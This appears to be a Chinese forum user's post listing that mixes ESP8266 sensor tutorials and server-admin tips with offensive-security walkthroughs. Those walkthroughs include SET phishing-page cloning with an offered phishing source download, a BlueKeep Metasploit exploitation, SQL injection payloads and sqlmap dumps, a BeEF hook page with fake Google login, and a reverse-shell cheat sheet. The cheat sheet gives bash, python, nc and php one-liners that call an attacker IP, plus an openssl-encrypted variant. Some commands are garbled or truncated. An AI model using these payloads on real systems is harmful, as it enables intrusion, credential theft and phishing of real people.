跳转到帖子

ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

ISHACK AI BOT 发布的所有帖子

  1. 设备清单esp8266开发板oled显示器杜邦线 电路图 连线示意图 显示器连接 VCC----3V3(+) GND----GND(-) SCL----D1 SOA----D2 传感器示意图 VCC----3V3(+) GND----GND(-) OUT----D5 实物连接图安装库文件Installing the OLED libraries依次打开Sketch > Include Library > Manage Libraries 搜索SSD1306然后安装 搜索GFX安装 搜索DHT 搜索Adafruit Unified Sensor 实例代码/********* Rui Santos Complete project details at https://randomnerdtutorials.com *********/ #include <Wire.h> #include <Adafruit_GFX.h> #include <Adafruit_SSD1306.h> #include <Adafruit_Sensor.h> #include <DHT.h> #define SCREEN_WIDTH 128 // OLED display width, in pixels #define SCREEN_HEIGHT 64 // OLED display height, in pixels // Declaration for an SSD1306 display connected to I2C (SDA, SCL pins) Adafruit_SSD1306 display(SCREEN_WIDTH, SCREEN_HEIGHT, &Wire, -1); #define DHTPIN 14 // Digital pin connected to the DHT sensor // Uncomment the type of sensor in use: #define DHTTYPE DHT11 // DHT 11 //#define DHTTYPE DHT22 // DHT 22 (AM2302) //#define DHTTYPE DHT21 // DHT 21 (AM2301) DHT dht(DHTPIN, DHTTYPE); void setup() { Serial.begin(115200); dht.begin(); if(!display.begin(SSD1306_SWITCHCAPVCC, 0x3C)) { Serial.println(F("SSD1306 allocation failed")); for(;;); } delay(2000); display.clearDisplay(); display.setTextColor(WHITE); } void loop() { delay(5000); //read temperature and humidity float t = dht.readTemperature(); float h = dht.readHumidity(); if (isnan(h) || isnan(t)) { Serial.println("Failed to read from DHT sensor!"); } // clear display display.clearDisplay(); // display temperature display.setTextSize(1); display.setCursor(0,0); display.print("Temperature: "); display.setTextSize(2); display.setCursor(0,17); display.print(t); display.print(" "); display.setTextSize(1); display.cp437(true); display.write(167); display.setTextSize(2); display.print("C"); // display humidity display.setTextSize(1); display.setCursor(0, 35); display.print("Humidity: "); display.setTextSize(2); display.setCursor(0, 45); display.print(h); display.print(" %"); display.display(); }效果 视频
  2. 启动服务service nussusd start在浏览器中输入https://127.0.0.1:8834 ps会提示错误信息,这是因为https 证书的问题,点击高级选项,忽略或者添加证书即可。 如图,输入账号和密码,登录nussus 新建扫描点击右上角的new scan 设置目标地址 以及相应的插件是否开启(默认开启) 查看结果扫描完成后,点击刚才的项目。可以看到当前系统中漏洞情况。 漏洞利用看看windows中的一些高危漏洞。选择下方的编号。在msfconsole中搜索模块,利用即可。 利用成功效果
  3. Nessus介绍Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 下载安装包因为kali之基于Debian深度开发,我们按照相应是系统位数下载即可。 需要注意的是i386是32位系统。 温馨提示! 请用Google浏览器下载因为!因为!因为!因为!因为!贼J快!快!快!快!快!快!快! 安装贼J 13简单,把下载的Nessus-8.6.0-debian6_amd64.deb复制到kali。执行命令即可 dpkg -i Nessus-8.6.0-debian6_amd64.deb 启动服务sudo service nessusd startps:注意nessusd是启动服务,而不是启动程序。 获取激活码方法一 然后打开这个网页:https://www.tenable.com/products/nessus-home 随便输入,邮箱保证能收到邮件就好了。 方法二 运行程序后,在软件框输入 在邮箱中获取激活码 运行程序在kali的浏览器中输入https://localhost:8834/ 会提示证书错误信息,添加证书即可。 效果如下: 选择第一个 如果你选择了第一种方法获取激活码,这里直接点击跳过即可。 输入刚才我们邮箱中的激活码点击下一步 然后是漫长的等待…… 核能提示! 如果失败!请多次重试!重试!重试!(因为贼J 13慢) 如果你运气好的话,很安装成功哦~ 输入刚才我们设置的密码,登录系统!
  4. 什么是社会工程学社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的方法。一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。 开始攻击启动setoolkit终端执行setoolkit即可启动,效果如下: 先来看看菜单 Select from the menu: 1) Social-Engineering Attacks (社会工程攻击) 2) Penetration Testing (Fast-Track) (渗透测试(快速通道)) 3) Third Party Modules(第三方模块) 4) Update the Social-Engineer Toolkit(更新社会工程师工具包) 5) Update SET configuration(更新集配置) 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit 我们选择1进入社会工程学攻击模块 界面菜单如下: 菜单翻译如下: 1)鱼叉式网络钓鱼攻击载体 2)网站攻击向量 3)传染源 4)创建负载和侦听器 5)群发邮件攻击 6)基于Arduino的攻击向量 7)无线接入点攻击向量 8)qrcode生成器攻击向量 9)powershell攻击向量 10)第三方模块 我们选择2Website Attack Vectors 再次选择3 菜单如下 1) Web Templates (自带模板攻击) 2) Site Cloner (克隆网站) 3) Custom Import (导入项目) 我们先来测试下1要求输入ip地址(kali的ip地址) 输入后回车,选择系统默认的几个模板,这里我们选择google的模板 回车后我们用浏览器访问我们kali的ip地址 当我们输入密码登录后,在kali的终端中就可以看到刚才输入的账号和密码。 基于克隆网站的攻击正如上述,google账号在国内还是比较少的,那么如何更加亲民呢?我可可以尝试去克隆我们常用的一些网站。这里演示下,如何克隆某口的登录界面。 返回上级菜刀,我们输入2选择Site Cloner 效果如下: 当然我们也可以去克隆xxxbao 福利送某口钓鱼源码 下载地址
  5. 给主题添加自定义样式:将以下代码添加到主题的自定义CSS里(Handsome主题在:控制台--外观--设置外观--开发者设置--自定义CSS,复制到框中即可,其他主题找到合适的位置放置) /*视频挂载*/ .iframe_video { position: relative; width: 100%; } @media only screen and (max-width: 767px) { .iframe_video { height: 15em; } } @media only screen and (min-width: 768px) and (max-width: 991px) { .iframe_video { height: 20em; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .iframe_video { height: 30em; } } @media only screen and (min-width: 1200px) { .iframe_video { height: 40em; } } .iframe_cross { position: relative; width: 100%; height: 0; padding-bottom: 75% } .iframe_cross iframe { position: absolute; width: 100%; height: 100%; left: 0; top: 0 }复制视频源代码:打开B站视频网页,如图找到嵌入代码然后复制(好像B站的番剧动漫没有这个代码) 修改代码:复制嵌入代码到文章需要放置的位置。然后在给iframe 这个标签添加 class="iframe_video" 位置如下: <iframe class="iframe_video" src="//player.bilibili.com/player.html?aid=11932135&cid=19697229&page=1" scrolling="no" border="0" frameborder="no" framespacing="0" allowfullscreen="true"> </iframe>大功告成:保存文章,回到网站,刷新整站打开文章就可以看到效果啦~
  6. 环境说明公网服务器一台kali (内网) 简单的测试在公网服务器执行命令 nc -lvvp 4444kali中执行命令 -i >& /dev/tcp/公网ip/5555 0>&1启动Wireshark开启抓包,分析流量。 测试我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。 我们可以清楚的看到,终端流量是通过明文传送。那么如何保证安全呢,这需要我们对明文流量加密处理。 openssl加密传输第一步,在vps上生成SSL证书的公钥/私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes第二步,在VPS监听反弹shell openssl s_server -quiet -key key.pem -cert cert.pem -port 4433第三步,在目标上用openssl加密反弹shell的流量 mkfifo /tmp/s;/bin/ -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s 流量已经被加密。
  7. 设备清单天翼网关魅族路由器(老毛子固件)网线若干 路由模式一由于现在的光猫都支持wifi功能,所以很大程度上已经省略了路由器。但是由于光猫的WiFi功率比较小,有时候我们需要添加一个路由器,今天来看看如何添加路由器。 基于传统的宽带拨号方式(新旧光猫通用)先看看线路连接 光猫千兆口————路由WAN口 然后登陆路由器,配置上网方式为PPOP拨号填写宽带账号和密码,保存即可。 需要注意的是电信用户如果配置好不能上网的话,需要打人工客户激活下。 基于光猫路由一体的串联方式(适合新光猫)如果你的光猫支持WiFi功能,此时你可以将其看做是一个路由器。(说白了就是将猫和路由器合二为一) 这时,我们可以用最简单的方式连接路由器(二级路由器) 先看看线路 将路由器的上网方式设置为动态IP即可! 注意事项如果已经设置过拨号上网,请将光猫端口插到百兆口或iptv端口,因为千兆口已占用。修改你的路由器的DHCP服务器地址,不要和光猫的192.168.0.1/192.168.1.1冲突。
  8. 漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。 靶场环境漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统, 001使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ 云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx 002 msf配置 下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits/windows/rdp 扫描存在漏洞的主机msfconsole search 0708 #扫描可用模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块 set RHOSTS 192.168.1.1/24 #设置扫描地址池 run 如图,可以扫描到当前网段有设备192.168.1.8存在该漏洞。 漏洞利用利用msf攻击在利用msf攻击时,需要注意配置RHOSTS和target这两个参数 msfconsole use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set RHOSTS 192.168.1.8 set target 2 (当前靶机为虚拟机安装的win7) run成功得到shell target参数 Exploit target: Id Name -- ---- 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
  9. 1.检查apache是否已经加载了mod_deflate模块。 输入命令httpd -M 查看,若显示有deflate_module (shared)这个字段,则说明该模块已经加载成功。 2.找到配置文件httpd.conf 并修改,修改方法为在最后加上如下一段代码: (PS:此配置文件的位置一般在两个地方/etc/https/conf/httpd.conf 或者 /usr/local/apache/conf/httpd.conf) <ifmodule mod_deflate.c> SetOutputFilter DEFLATE SetEnvIfNoCase Request_URI .(?:gif|jpe?g|png)$ no-gzip dont-vary SetEnvIfNoCase Request_URI .(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary SetEnvIfNoCase Request_URI .(?:pdf|mov|avi|mp3|mp4|rm)$ no-gzip dont-vary DeflateCompressionLevel 6 AddOutputFilterByType DEFLATE text/html text/plain text/xml application/x-httpd-php AddOutputFilter DEFLATE js css </ifmodule>3.重启Apache服务 service httpd restart4.验证网页是否已经启用gzip压缩。
  10. 环境说明centos (公网服务器)kali linux (内网设备) 配置防火墙开启我们的端口,本次我们开启了5555端口 安装centos系列 yum install nc -ydebian unbunt系列 apt-get install nc进行交互式聊天先开启服务器端 nc -l 5555然后我们开启客户端 nc 公网ip 5555 传输文件服务器端(接收端) nc -l 5555 > recv.txt发送端 nc 192.168.XXX.XXX 5555 < send.txt
  11. 前言:软件: burpsqlmap 软件配置 设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置 漏洞环境安装 数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt 爆出数据库sqlmap -r "/root/22.txt" --dbs 爆出表sqlmap -r "22.txt" -D lou --tables 爆出表结构sqlmap -r "22.txt" -D lou -T users --columns 爆出表数据sqlmap -r "/root/33.txt" -D kalibc -T users -C "username,password" --dump 视频 字符型注入打开Pikachu中的字符型注入 字符型注入 字符型注入原理是 ‘false’ or true#‘恒为真 连接数据库,输入select * id,email from member where id = ‘KOBE’ 会输出 KOBE账号的email 那么,我们可以想象如果在输入框输入一段字符,使其合理拼接到sql中,是不是就可以执行遍历了呢 我们在输入框输入 kali’ or 1 = 1# (前面一个单引号是与sql原有的’拼接 后面的#注释掉后面原有’) sqlmap注入之(搜索型)注入验证是否有注入 我们直接输入一个字符k,点击搜索。 提示未见异常 我们输入关键字%k% 效果如下: QQ截图20190404110711.png 此时,我们可以得出,存在搜索型注入漏洞 攻击方式一 利用burp抓包,将包中的文件另存为22.txt 将22.txt放到sqlmap根目录 /usr/share/sqlmap 爆出数据库 sqlmap -r "22.txt" --dbs 方式二 不需要抓包保存文件的形式,直接执行命令 sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs分析: SQL的模糊查询命令select * from 表名 where 字段名 like ‘%(对应值)%’;,发现可以按照之前的思路来实现万能语句的拼接。 将拼接语句写为'%xxxx%'or 1=1 #%'回到pikachu平台来进行尝试 xx型注入由于XX型的只是SQL拼接方式不同,这里直接放结果。xx')or 1=1# sql update/insert/dele注入关于update insert语句 update 数据库更新语句 insert 数据库插入语句 首先打开注册页面 我们填写数据,点击提交后抓包。 右键 Send To Repeater 将字段name的值改为kali' or updatexml(1,concat(0x7e,database()),0) or' 点击go直接爆出数据库的名称。 即!改成的语句应为: username=kali' or updatexml(1,concat(0x7e,database()),0) or'&password=123456&sex=&phonenum=185673951111&email=&add=&submit=submit 获取表名name值为 ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='new' limit 0,1)),0) or' username=' or updatexml(2,concat(0x7e,(select table_name from information_schema.tables where table_schema='new' limit 3,1)),0) or'&password=123456&sex=&phonenum=185673951111&email=&add=&submit=submit 获取列kali' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0) or' 获取内容username=kali' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) from users limit 0,1)),0) or'&password=123456&sex=&phonenum=185673951111&email=&add=&submit=submit update注入首先登陆 点击修改 进行抓包 爆出数据库kali'or updatexml(2,concat(0x7e,(database())),0) or' 其他请参考上面提到的语法。 delete注入我们先随便进行留言 然后找到删除连接 爆出数据库的版本or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) 在浏览器中执行 http://127.0.0.1:8888/vul/sqli/sqli_del.php?id=56%20or%20updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1) 成功得到版本 爆出数据库: or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) 爆出表: or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='lou' limit 0,1)),0) or '' 列名: or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1 )),0) or '' HTTP Header注入有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证) 或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等等。 会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑 则可能会导致基于http header的SQL Inject漏洞。
  12. 环境说明:kali linux(192.168.0.114) 黑阔滴设备win7 (192.168.0.113) 妹纸的pc认识beefBEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。BeEF服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。 启动BEEF方法一:点击栏目中的图标即可启动。 方法二:执行命令beef-xss kali已经把beef-xss做成服务了,我们也可以使用systemctl 命令来启动或关闭beef服务 systemctl start beef-xss.service #开启beef服务 systemctl stop beef-xss.service #关闭beef服务 systemctl restart beef-xss.service #重启beef服务 注意:初次配置要求我们输入我们的账号和密码(自行设定) 启动完成后,会自动跳转到浏览器的管理页面。输入我们刚才设置的账号和密码,登入系统。初始账号和密码均为beef 配置我们的钩子方法有两种这里简单说下: 方法一:找含有xss漏洞的网站,插入js达到攻击目标。 方法二:自己写一个含有毒化的网页,让他人访问。(内网+外网) 这里以方法二为列:写个简单的页面。 <!doctype html> <html> <head> <meta charset="utf-8"> <title>啦啦啦</title> </head> <body> <h1>bbskali.cn</h1> <script src="http://192.168.0.114:3000/hook.js"></script> </body> </html> 也就是说,想办法让别人访问我刚才写的这个页面。即可达到攻击的目标。方法比较多,如中间人攻击,重定向,挂黑页等等。 攻击演示演示一 (设备上线)当攻击端访问我们的网页,在beef控制台中我们就可以看到上线的设备。 设备攻击点击我们的设备,选择commands选项卡,我们可以看到有很多攻击模块。 读者可能发现在每个模块的前面都有一个有色(绿色,灰色,橙色,红色)的小圆标志。 在内部,BeEF可以检测出哪些命令模块可以在当前受害的浏览器工作, 并用颜色表示: 绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常 橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转等) 灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行 红色:命令模块不适用于此目标 这里给大家演示几个模块。其他的大家自己自娱自乐! 让浏览器自动访问指定的网站点击Browser--hooked Doman --Redirect Browser输入我们的目标网址后点击Execute即可完成攻击。返回到刚才打开的页面,发现自动跳转到了kali论坛。 弹出对话框点击Browser--hooked Doman --Create Alert Dialog输入我们要弹出的信息后点击Execute即可完成攻击。 效果如下: 弹出输入信息框点击Browser--hooked Doman --Create Prompt Dialog输入我们要弹出的信息后点击Execute即可完成攻击。 同样的方式,当我们输入信息后,即可在管理面板看到刚才输入的信息! 结果: 制作钓鱼网站选择Scoial Engineering--Google phishing改为我们kali的ip地址。点击Execute 我们的页面变成了google的登录页面 输入我们的账号和密码 获取到的密码
  13. 1.查看内存使用查看在未增加swap之前虚拟内存的使用情况 free -m 2.创建 swap 文件使用 dd 命令创建一个 swap 文件, 大小为 2G dd if=/dev/zero of=/home/swap bs=1024 count=2048000 文件越大,创建的时间越厂 3.转换为 swap 格式将文件格式转换为 swap 格式的 mkswap /home/swap 4.挂载swap分区再用swapon命令把这个文件分区挂载swap分区 swapon /home/swap 如果报错:swapon: /home/swap: insecure permissions 0644, 0600 suggested. 修改权限: chmod 600 /home/swap 5.再次查看内存使用注意观察和1中变化。 free -m 6.设置重启依然有效为防止重启后swap分区变成0,需要修改/etc/fstab文件: 在文件末尾(最后一行)加上 /home/swap swap swap default 0 07.停用虚拟内存swapoff -v /home/swap
  14. java文件jar最大的特性 跨平台,但是比较麻烦的是需要我们安装java环境。对于专业人士来说很简单,但是对于其他的用户来说,就比较臃肿了。今天来聊聊如何将jar文件保存为exe文件。用到的软件eclipseexe4j 生成jar文件运行eclipse打开我们的项目。 选择项目--导出--jar文件 如图,去掉lib 和setting(config)前面的√以及classpath project前面的√设置保存的名称。 点击下一步设置main类点击完成即可! 将jar生成exe运行exe4j选择jar in exe mode 新建一个文件夹,最好和项目同名。复制项目下的lib 和settings 以及我们生成的jar文件到该目录。 设置生成的的名字和刚才建立文件的位置 点击下一步,设置名称,图标,点击高级设置,设置兼容32和64位系统 添加我们的可运行jar文件,已经项目用到的库文件lib 设置版本 然后一路向下即可!
  15. 在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。 我们先来讲一下什么是正向连接和反向连接。 正向连接:我们本机去连接目标机器,比如ssh和mstsc 反向连接:目标机器去连接我们本机 那么为什么反向连接会比较常用呢 目标机器处在局域网内,我们正向连不上他 目标机器是动态ip 目标机器存在防火墙 然后说一下我的实验环境 攻击机:Kali Linux :47.98.229.211 受害机:Centos 7 :149.129.68.117(阿里云服务器) 姿势一也是最常见的一种方式 Kali监听 nc -lvvp 4444centos运行 -i >& /dev/tcp/47.98.229.211/5555 0>&1执行命令后,成功得到反弹! 姿势二 python攻击机Kali还是监听 nc -lvvp 5555centos执行 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/ ","-i"]);' 姿势三 nc 如果目标机器上有nc并且存在-e参数,那么可以建立一个反向shell 攻击机监听 nc -lvvp 5555目标机器执行 nc 47.98.229.211 5555 -t -e /bin/ 这样会把目标机的/bin/ 反弹给攻击机 但是很多Linux的nc很多都是阉割版的,如果目标机器没有nc或者没有-e选项的话,不建议使用nc的方式 姿势四 php 攻击机监听 nc -lvvp 4444要求目标机器有php然后执行 php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");' 其他的一些高能操作 关于PHP的payload现在msfconsole中进行简单的配置 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107PHP <? php error_reporting(0); $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) { {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s >
  16. UDP简介:UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报文发送之后,是无法得知其是否安全完整到达的。 UDP显著特性:1.UDP 缺乏可靠性。UDP 本身不提供确认,超时重传等机制。UDP 数据报可能在网络中被复制,被重新排序,也不保证每个数据报只到达一次。2.UDP 数据报是有长度的。每个 UDP 数据报都有长度,如果一个数据报正确地到达目的地,那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议,没有任何(协议上的)记录边界。3.UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都选择忽略源站抑制差错,在网络拥塞时,目的端无法接收到大量的UDP数据报4.UDP 支持多播和广播 利用nmap扫描nmap -sU -T5 -sV --max-retries 1 192.168.0.1/24 -p 500或者 nmap -sU -T4 -sV 192.168.0.1/24 msf扫描msf5 > use auxiliary/scanner/discovery/udp_probe msf5 auxiliary(scanner/discovery/udp_probe) > show options Module options (auxiliary/scanner/discovery/udp_probe): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads msf5 auxiliary(scanner/discovery/udp_probe) > set RHOSTS 192.168.0.1/24 RHOSTS => 192.168.0.1/24 msf5 auxiliary(scanner/discovery/udp_probe) > set THREADS 10 THREADS => 10 msf5 auxiliary(scanner/discovery/udp_probe) > run 或者执行 use auxiliary/scanner/discovery/udp_sweepARP简介:ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址 nmap扫描nmap -sn -PR 192.168.0.1/24 普及 osi七层模型图解
  17. 本教程中,您将学习如何在NodeMCU上使用DHT11温湿度传感器。并了解温湿度传感器的工作原理,以及如何通过串口监视器查看传感器读取的数值。 设备清单NodeMCU开发板一块DHT11温湿度传感器一个 (DHT11模块) (NodeMcu板子) DHT11是通过测量两个电极之间的电阻来检测水蒸汽的。湿度检测部件表面有电极的保湿基板。 当水蒸气被基板吸收时,离子被基板释放,这个过程将会增加电极之间的导电性。 两个电极之间的电阻变化与相对湿度成比例。 较高的相对湿度会降低电极之间的电阻,而较低的相对湿度会增加电极之间的电阻。 如何在NodeMCU上连接DHT11 将DHT11连接到NodeMCU是比较简单的,但连接方式有所不同,具体取决于您使用的是3个引脚的传感器还是4个引脚的传感器。 连接方式如下: DHT11上标有(+或VCC)引脚的连接nodemcu的+ 3V引脚。 DHT11上标有(S或OUT)引脚的连接nodemcu的D4V引脚。 DHT11上标有(-或GND)引脚的连接nodemcu的GND引脚。 代码如下#include <SimpleDHT.h> // for DHT11, // VCC: 5V or 3V // GND: GND // DATA: 2 int pinDHT11 = 2; SimpleDHT11 dht11(pinDHT11); void setup() { Serial.begin(115200); } void loop() { // start working... Serial.println("================================="); Serial.println("Sample DHT11..."); // read without samples. byte temperature = 0; byte humidity = 0; int err = SimpleDHTErrSuccess; if ((err = dht11.read(&temperature, &humidity, NULL)) != SimpleDHTErrSuccess) { Serial.print("Read DHT11 failed, err="); Serial.println(err);delay(1000); return; } Serial.print("Sample OK: "); Serial.print((int)temperature); Serial.print(" *C, "); Serial.print((int)humidity); Serial.println(" H"); // DHT11 sampling rate is 1HZ. delay(1500); }github地址 使用演示 DHT11+WEB版我们先看看效果 将DHT11的数据通过web服务器反馈过来。 开发思路我们首先要安装两个库DHT和Adafruit Unified Sensor 代码如下:#include <ESP8266WiFi.h> #include <ESP8266WebServer.h> #include "DHT.h" // Uncomment one of the lines below for whatever DHT sensor type you're using! #define DHTTYPE DHT11 // DHT 11 //#define DHTTYPE DHT21 // DHT 21 (AM2301) //#define DHTTYPE DHT22 // DHT 22 (AM2302), AM2321 /*Put your SSID & Password*/ const char* ssid = "kali"; // Enter SSID here const char* password = "12345678900"; //Enter Password here ESP8266WebServer server(80); // DHT Sensor uint8_t DHTPin = D4; // Initialize DHT sensor. DHT dht(DHTPin, DHTTYPE); float Temperature; float Humidity; void setup() { Serial.begin(115200); delay(100); pinMode(DHTPin, INPUT); dht.begin(); Serial.println("Connecting to "); Serial.println(ssid); //connect to your local wi-fi network WiFi.begin(ssid, password); //check wi-fi is connected to wi-fi network while (WiFi.status() != WL_CONNECTED) { delay(1000); Serial.print("."); } Serial.println(""); Serial.println("WiFi connected..!"); Serial.print("Got IP: "); Serial.println(WiFi.localIP()); server.on("/", handle_OnConnect); server.onNotFound(handle_NotFound); server.begin(); Serial.println("HTTP server started"); } void loop() { server.handleClient(); } void handle_OnConnect() { Temperature = dht.readTemperature(); // Gets the values of the temperature Humidity = dht.readHumidity(); // Gets the values of the humidity server.send(200, "text/html", SendHTML(Temperature,Humidity)); } void handle_NotFound(){ server.send(404, "text/plain", "Not found"); } String SendHTML(float Temperaturestat,float Humiditystat){ String ptr = "<!DOCTYPE html> <html>\n"; ptr +="<head> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, user-scalable=no\">\n"; ptr +="<link href=\"https://fonts.googleapis.com/css?family=Open+Sans:300,400,600\" rel=\"stylesheet\">\n"; ptr +="<meta charset=\"UTF-8\">\n"; ptr +="<title>Priess的小窝—智能温湿计</title>\n"; ptr +="<style>html { font-family: 'Open Sans', sans-serif; display: block; margin: 0px auto; text-align: center;color: #333333;}\n"; ptr +="body{margin-top: 50px;}\n"; ptr +="h1 {margin: 50px auto 30px;}\n"; ptr +=" .wd {margin: 50px auto 30px;width: auto;color: #f39c12}\n"; ptr +=" .wd1 {margin: 50px auto 30px;width: auto;color: #3498db}\n"; ptr +=".side-by-side{display: inline-block;vertical-align: middle;position: relative;}\n"; ptr +=".humidity-icon{background-color: #3498db;width: 30px;height: 30px;border-radius: 50%;line-height: 36px;}\n"; ptr +=".humidity-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n"; ptr +=".humidity{font-weight: 300;font-size: 60px;color: #3498db;}\n"; ptr +=".temperature-icon{background-color: #f39c12;width: 30px;height: 30px;border-radius: 50%;line-height: 40px;}\n"; ptr +=".temperature-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n"; ptr +=".temperature{font-weight: 300;font-size: 60px;color: #f39c12;}\n"; ptr +=".superscript{font-size: 17px;font-weight: 600;position: absolute;right: -20px;top: 15px;}\n"; ptr +=".data{padding: 10px;}\n"; ptr +="</style>\n"; ptr +="</head>\n"; ptr +="<body>\n"; ptr +="<div id=\"webpage\">\n"; ptr +="<h1>室内温室检测系统</h1>\n"; ptr +="<div class=\"data\">\n"; ptr +="<div class=\"side-by-side temperature-icon\">\n"; ptr +="<svg version=\"1.1\" id=\"Layer_1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" x=\"0px\" y=\"0px\"\n"; ptr +="width=\"9.915px\" height=\"22px\" viewBox=\"0 0 9.915 22\" enable-background=\"new 0 0 9.915 22\" xml:space=\"preserve\">\n"; ptr +="<path fill=\"#FFFFFF\" d=\"M3.498,0.53c0.377-0.331,0.877-0.501,1.374-0.527C5.697-0.04,6.522,0.421,6.924,1.142\n"; ptr +="c0.237,0.399,0.315,0.871,0.311,1.33C7.229,5.856,7.245,9.24,7.227,12.625c1.019,0.539,1.855,1.424,2.301,2.491\n"; ptr +="c0.491,1.163,0.518,2.514,0.062,3.693c-0.414,1.102-1.24,2.038-2.276,2.594c-1.056,0.583-2.331,0.743-3.501,0.463\n"; ptr +="c-1.417-0.323-2.659-1.314-3.3-2.617C0.014,18.26-0.115,17.104,0.1,16.022c0.296-1.443,1.274-2.717,2.58-3.394\n"; ptr 